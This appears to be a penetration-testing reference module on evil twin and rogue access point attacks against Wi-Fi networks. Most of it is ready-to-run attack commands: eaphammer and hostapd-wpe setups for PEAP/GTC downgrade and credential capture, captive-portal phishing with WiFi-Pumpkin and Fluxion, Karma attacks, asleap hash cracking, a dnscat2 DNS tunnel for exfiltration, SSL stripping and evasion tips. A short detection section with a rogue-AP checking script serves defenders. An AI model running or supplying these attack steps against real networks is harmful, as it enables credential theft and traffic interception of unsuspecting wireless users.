
Evil Twin and Rogue Access Point

# Overview

An evil twin is a rogue access point that mimics a legitimate AP's SSID, security type, and often MAC address to trick clients into connecting. Once connected, the attacker can intercept traffic, harvest credentials, and launch further attacks. This is the primary attack against enterprise WPA2-802.1X networks and a powerful technique for credential phishing on PSK networks.

Rogue APs are related but broader — any unauthorized access point set up by the attacker, whether it mimics a legitimate AP or not.

# Attack Decision Tree

```text
Goal: Harvest Credentials or Intercept Traffic?
  |
  |-- Credential Harvesting (Enterprise 802.1X)
  |     |-- PEAP network? --> eaphammer (PEAP/GTC downgrade)
  |     |-- EAP-TTLS network? --> hostapd-wpe
  |     |-- EAP-TLS network? --> Certificate theft or social engineering
  |     |-- Unknown EAP type? --> Probe with eaphammer
  |
  |-- Credential Harvesting (PSK)
  |     |-- Captive portal --> WiFi-Pumpkin / Fluxion
  |     |-- Force reconnection --> Deauth + evil twin
  |
  |-- Traffic Interception
  |     |-- Open network --> Rogue AP (no encryption)
  |     |-- WPA2 network --> Downgrade to open or WEP
  |     |-- HTTPS targets --> SSL strip or bypass
  |
  |-- Karma Attack
        |-- Respond to all probe requests --> hostapd-wpe / eaphammer
```

# Setup: Evil Twin with eaphammer

eaphammer is the most capable tool for enterprise evil twin attacks, supporting PEAP, EAP-TTLS, EAP-FAST, and credential harvesting.

## Installation

```bash
# Install eaphammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup

# Or via pip
pip install eaphammer
```

## PEAP/GTC Downgrade Attack

This is the most common enterprise attack: it downgrades the inner method from PEAP/MSCHAPv2 to PEAP/GTC, which sends the username and password in cleartext (or as an easily crackable challenge-response).

```bash
# Basic evil twin with PEAP/GTC downgrade
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth peap \
  --wpa 2

# With captive portal for credential harvesting
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth peap \
  --wpa 2 \
  --captive-portal

# Full enterprise evil twin with all options
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth peap \
  --wpa 2 \
  --captive-portal \
  --lport 80 \
  --ap-port 443
```

## Monitoring Captured Credentials

```bash
# eaphammer logs credentials to console and file
# Check the log file for captured MS-CHAPv2 hashes and cleartext credentials
cat /tmp/eaphammer-*.log

# MS-CHAPv2 hashes can be cracked with asleap
asleap -C <challenge> -R <response> -W wordlist.txt

# Or convert for hashcat
# hashcat mode 5500 = NetNTLMv1, mode 5600 = NetNTLMv2
```

# Setup: Evil Twin with hostapd-wpe

hostapd-wpe (Wireless Pwnage Edition) is a patched hostapd that logs EAP credentials and supports PEAP/GTC downgrade.

## Configuration

```bash
# Create hostapd-wpe configuration
cat > /tmp/hostapd-wpe.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CH>
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=<password>
dh_file=/etc/hostapd-wpe/dh.pem
EOF

# Start the evil twin
sudo hostapd-wpe /tmp/hostapd-wpe.conf
```

## Captured Credentials

```bash
# hostapd-wpe logs to /tmp/hostapd-wpe.log
# Captured credentials include:
# - Username
# - MS-CHAPv2 challenge/response (crackable with asleap)
# - EAP-Identity
# - GTC cleartext passwords

# Crack MS-CHAPv2
asleap -C <challenge> -R <response> -W wordlist.txt
```

# Setup: Captive Portal (WiFi-Pumpkin / Fluxion)

For PSK networks, a captive portal is more effective than EAP downgrade. The attacker deauths clients and presents a fake login page that mimics the AP's management interface.

## WiFi-Pumpkin

```bash
# Install WiFi-Pumpkin
pip3 install wifi-pumpkin

# Start WiFi-Pumpkin
sudo wifi-pumpkin

# In the GUI:
# 1. Set SSID to target network name
# 2. Set interface and channel
# 3. Enable "Captive Portal" plugin
# 4. Configure the portal page (mimic router login)
# 5. Start the access point
# 6. Deauth clients to force reconnection to evil twin
```

## Fluxion

```bash
# Install Fluxion
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
sudo ./fluxion.sh

# Fluxion workflow:
# 1. Scan for target networks
# 2. Capture handshake (for verification)
# 3. Start evil twin AP
# 4. Deauth clients
# 5. Present captive portal
# 6. Capture entered credentials
# 7. Verify against captured handshake
```

# Karma Attacks

Karma attacks respond to all client probe requests, making the evil twin appear as any network the client has previously connected to.

```bash
# eaphammer with Karma
sudo eaphammer --interface wlan0 \
  --essid "" \
  --channel <CH> \
  --auth peap \
  --wpa 2 \
  --karma

# hostapd-wpe with Karma (via karma patch)
# The Karma patch makes the AP respond to all directed probe requests
# regardless of SSID
```

# LNR (Lazy Network Research) Attack

A variation of Karma that responds to directed probe requests with matching SSIDs, making the AP appear as any saved network.

```bash
# Monitor probe requests first
sudo airodump-ng wlan0mon
# Note common SSIDs from probe requests

# Configure the evil twin to respond to those SSIDs
# eaphammer supports multiple SSIDs
sudo eaphammer --interface wlan0 \
  --essid "Starbucks" \
  --essid "HotelWiFi" \
  --essid "CorporateGuest" \
  --channel <CH> \
  --captive-portal
```

# DNS Tunneling Through Evil Twin

For exfiltrating data through the evil twin when direct internet access isn't available:

```bash
# Set up DNS tunneling on the evil twin
# Terminal 1: Start evil twin with internet relay
sudo eaphammer --interface wlan0 \
  --essid "<SSID>" \
  --channel <CH> \
  --internet \
  --auth peap

# Terminal 2: DNS tunnel server (dnscat2)
ruby dnscat2.rb --dns host=example.com,port=53

# Terminal 3: DNS tunnel client (on compromised device)
./dnscat --dns host=example.com,port=53
```

# SSL Strip and HTTPS Bypass

When intercepting traffic through the evil twin:

```bash
# Start the evil twin with internet relay
sudo eaphammer --interface wlan0 --essid "<SSID>" --channel <CH> --internet

# Run SSL strip on the relay interface
sslstrip -l 8080

# Or use bettercap for SSL stripping
sudo bettercap -iface <relay_interface>
net.sniff on
net.sniff.sslstrip on
```

# Detection

## How Defenders Detect Evil Twins

| Detection Method | Indicator |
|---|---|
| BSSID anomaly | Multiple BSSIDs for the same SSID |
| Signal strength variation | Stronger signal from attacker than legitimate AP |
| Channel mismatch | Evil twin on different channel than legitimate AP |
| Security type mismatch | Evil twin advertises different security (e.g., WPA2 vs open) |
| Certificate mismatch | Self-signed or wrong CA in EAP-TLS/PEAP |
| DHCP lease mismatch | Clients getting IPs from attacker's DHCP |
| WIDS correlation | Multiple APs for same SSID from different locations |
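The table above lists the indicators a WIDS correlates. The following is an added example (not code from this module or from any of the tools it lists) that runs those checks over constructed scan records against an inventory of authorised APs; the inventory values, record fields and RSSI threshold are assumptions for illustration.

```python
# Added example: correlate Wi-Fi scan records against an inventory of
# authorised APs and flag the evil-twin indicators from the detection table:
# BSSID anomaly, channel mismatch, security-type mismatch, signal anomaly and
# duplicate-SSID correlation. Inventory and scan data are constructed.
from collections import defaultdict

# Constructed inventory of authorised APs (assumed values, not a real site).
AUTHORISED = {
    "CorpWiFi": {"bssids": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
                 "channels": {6, 36}, "security": "WPA2-EAP", "max_rssi": -40},
}

# Constructed scan records in the shape a sensor parser might emit
# (field names are assumed). The second record is the rogue one.
SCAN = [
    {"ssid": "CorpWiFi", "bssid": "aa:bb:cc:00:00:01", "channel": 6,
     "security": "WPA2-EAP", "rssi": -62},
    {"ssid": "CorpWiFi", "bssid": "DE:AD:BE:EF:00:01", "channel": 11,
     "security": "OPEN", "rssi": -25},
    {"ssid": "Guest", "bssid": "11:22:33:44:55:66", "channel": 1,
     "security": "OPEN", "rssi": -70},
]

def detect_evil_twins(scan, authorised):
    """Return (subject, indicator, detail) tuples for managed SSIDs only."""
    alerts = []
    seen = defaultdict(set)  # ssid -> set of BSSIDs observed this sweep
    for rec in scan:
        policy = authorised.get(rec["ssid"])
        if policy is None:
            continue  # not an SSID we manage; nothing to compare against
        b = rec["bssid"].lower()  # normalise case before comparing
        seen[rec["ssid"]].add(b)
        if b not in policy["bssids"]:
            alerts.append((b, "bssid_anomaly", "BSSID not in inventory"))
        if rec["channel"] not in policy["channels"]:
            alerts.append((b, "channel_mismatch", f"channel {rec['channel']}"))
        if rec["security"] != policy["security"]:
            alerts.append((b, "security_mismatch", rec["security"]))
        if rec["rssi"] > policy["max_rssi"]:  # louder than any real AP should be
            alerts.append((b, "signal_anomaly", f"rssi {rec['rssi']} dBm"))
    # WIDS-style correlation: more distinct BSSIDs than the inventory allows
    for ssid, bssids in seen.items():
        if bssids - authorised[ssid]["bssids"]:
            alerts.append((ssid, "duplicate_ssid", f"{len(bssids)} BSSIDs seen"))
    return alerts

if __name__ == "__main__":
    for alert in detect_evil_twins(SCAN, AUTHORISED):
        print(alert)
```

The certificate and DHCP indicators need data a passive scan does not carry (supplicant logs, DHCP server leases), so they are not modelled here.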

## Evasion Techniques

  • Match the legitimate AP's channel and security settings exactly
  • Use the same BSSID as the legitimate AP (MAC spoofing)
  • Position the evil twin closer to target clients (stronger signal)
  • Use a legitimate-looking captive portal (mimic the real AP's login page)
  • Use SSL stripping or self-signed certificates that match the organization's domain

# Common Pitfalls

  1. Internet access: Clients expect internet access. Without it, they may disconnect. Always use --internet relay or set up NAT.
  2. Channel selection: Use the same channel as the legitimate AP for maximum client confusion.
  3. Certificate warnings: PEAP clients may show certificate warnings. Users who click through these warnings expose their credentials.
  4. Client caching: Modern clients cache AP information and may prefer the legitimate AP. Deauth helps force reconnection.
  5. DHCP exhaustion: If many clients connect simultaneously, the DHCP pool may be exhausted. Use a large enough range.

# OPSEC Considerations

  • Evil twin APs are visible to anyone scanning for WiFi networks
  • WIDS/WIPS will detect duplicate SSIDs with different BSSIDs
  • The evil twin's signal strength, channel, and security type may not match the legitimate AP
  • Captive portal phishing pages are detectable by security-aware users
  • Deauthentication frames to force reconnection are logged by enterprise APs
  • Always verify scope explicitly includes evil twin/rogue AP attacks

# Cross-References

## Tool References

| Tool | Purpose | Link |
|---|---|---|
| eaphammer | Enterprise evil twin, PEAP downgrade | https://github.com/s0lst1c3/eaphammer |
| hostapd-wpe | Rogue AP with credential logging | https://github.com/OpenSecurityResearch/hostapd-wpe |
| WiFi-Pumpkin | Rogue AP framework with captive portal | https://github.com/P0cL4b/WiFi-Pumpkin |
| Fluxion | Automated evil twin with captive portal | https://github.com/FluxionNetwork/fluxion |
| asleap | MS-CHAPv2 cracking | https://github.com/joswr1ght/asleap |
| bettercap | WiFi recon, deauth, MITM | https://www.bettercap.org/ |
| dnscat2 | DNS tunneling through evil twin | https://github.com/iagox86/dnscat2 |